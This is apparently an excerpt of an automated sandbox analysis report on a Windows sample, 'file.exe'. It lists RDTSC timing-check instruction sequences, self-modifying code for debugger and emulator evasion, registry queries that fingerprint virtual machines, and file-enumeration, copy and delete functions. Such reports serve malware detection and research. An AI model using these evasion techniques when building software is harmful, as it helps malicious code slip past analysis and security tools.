                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BABD94 second address: BABDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FE784B99A37h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BABDB2 second address: BABDDE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE784D2BECCh 0x00000008 push esi 0x00000009 jmp 00007FE784D2BEBBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0895 second address: BB08A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB08A9 second address: BB08AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9E11 second address: BB9E17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9E17 second address: BB9E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC9h 0x00000007 je 00007FE784D2BECBh 0x0000000d jmp 00007FE784D2BEBFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F73 second address: BB9F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F77 second address: BB9F94 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jg 00007FE784D2BEB6h 0x00000010 popad 0x00000011 push edi 0x00000012 jo 00007FE784D2BEB6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F94 second address: BB9F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F98 second address: BB9F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9F9C second address: BB9FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9FA5 second address: BB9FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA215 second address: BBA252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FE784B99A33h 0x0000000a jmp 00007FE784B99A37h 0x0000000f jc 00007FE784B99A26h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA38D second address: BBA39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE784D2BEB6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA4F0 second address: BBA4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA4F7 second address: BBA503 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE784D2BEBEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA503 second address: BBA517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FE784B99A3Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FE784B99A26h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA681 second address: BBA687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB635 second address: BBB645 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE784B99A2Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB645 second address: BBB663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FE784D2BEC7h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC10F7 second address: BC10FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0B46 second address: BC0B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0C91 second address: BC0CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 jmp 00007FE784B99A38h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC34BB second address: BC34CF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE784D2BEBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC34CF second address: BC34D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF61 second address: BCDF82 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FE784D2BEC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF82 second address: BCDF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF88 second address: BCDF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1F91 second address: BD1F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1F95 second address: BD1FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE784D2BEC5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD214E second address: BD216C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD216C second address: BD2176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD58A0 second address: BD58A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA224 second address: BDA245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE784D2BEBEh 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA245 second address: BDA26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE784B99A38h 0x0000000b popad 0x0000000c pushad 0x0000000d jo 00007FE784B99A26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA26D second address: BDA291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FE784D2BEB6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE784D2BEC1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA291 second address: BDA295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE138 second address: BEE13C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECC31 second address: BECC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECC35 second address: BECC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDB6 second address: BECDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FE784B99A3Bh 0x0000000c jmp 00007FE784B99A2Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDD3 second address: BECDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDD7 second address: BECDE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FE784B99A26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDE9 second address: BECDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED07C second address: BED090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784B99A30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED21A second address: BED220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED220 second address: BED225 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED35D second address: BED361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE09 second address: BEDE17 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE17 second address: BEDE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE1B second address: BEDE27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE27 second address: BEDE2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE2B second address: BEDE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FE784B99A40h 0x0000000c jmp 00007FE784B99A34h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE4D second address: BEDE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE57 second address: BEDE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE5B second address: BEDE67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE67 second address: BEDE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF05B0 second address: BF05BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF05BF second address: BF05D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Dh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF05D3 second address: BF05D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C00ADA second address: C00AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE784B99A37h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0230C second address: C02310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0214D second address: C02177 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE784B99A26h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE784B99A2Dh 0x00000015 jnl 00007FE784B99A26h 0x0000001b jne 00007FE784B99A26h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02177 second address: C02183 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE784D2BEBEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062D9 second address: C062DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062DD second address: C062E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDAC7 second address: BFDAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FE784B99A26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDAD4 second address: BFDAEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push ebx 0x0000000f ja 00007FE784D2BEB6h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23130 second address: C23144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23144 second address: C2314E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2359E second address: C235A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25914 second address: C25956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FE784D2BEC3h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 jmp 00007FE784D2BEC4h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25956 second address: C2595A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2578F second address: C25795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29C16 second address: C29C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 nop 0x00000007 pushad 0x00000008 mov ax, B6A4h 0x0000000c mov dword ptr [ebp+122D2A4Fh], ecx 0x00000012 popad 0x00000013 push 00000004h 0x00000015 push DFA79E64h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29C36 second address: C29C3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29E64 second address: C29E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527046C second address: 52704C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FE784D2BEC4h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE784D2BEBDh 0x0000001c sbb cl, 00000066h 0x0000001f jmp 00007FE784D2BEC1h 0x00000024 popfd 0x00000025 call 00007FE784D2BEC0h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52704C6 second address: 5270513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE784B99A2Eh 0x00000009 add si, 6338h 0x0000000e jmp 00007FE784B99A2Bh 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE784B99A34h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE784B99A2Ah 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270513 second address: 5270522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270557 second address: 5270577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, 526552A3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270577 second address: 52705C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE784D2BEC8h 0x00000008 and cl, FFFFFFE8h 0x0000000b jmp 00007FE784D2BEBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ax, DFDFh 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE784D2BEC7h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52705C4 second address: 52705CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4682E second address: B46832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46832 second address: B46836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46C10 second address: B46C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 99D964 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B3D223 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37506
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006C40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_006BE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006B1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006C47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006BF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006C4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006C3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_006BDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_006BBE40
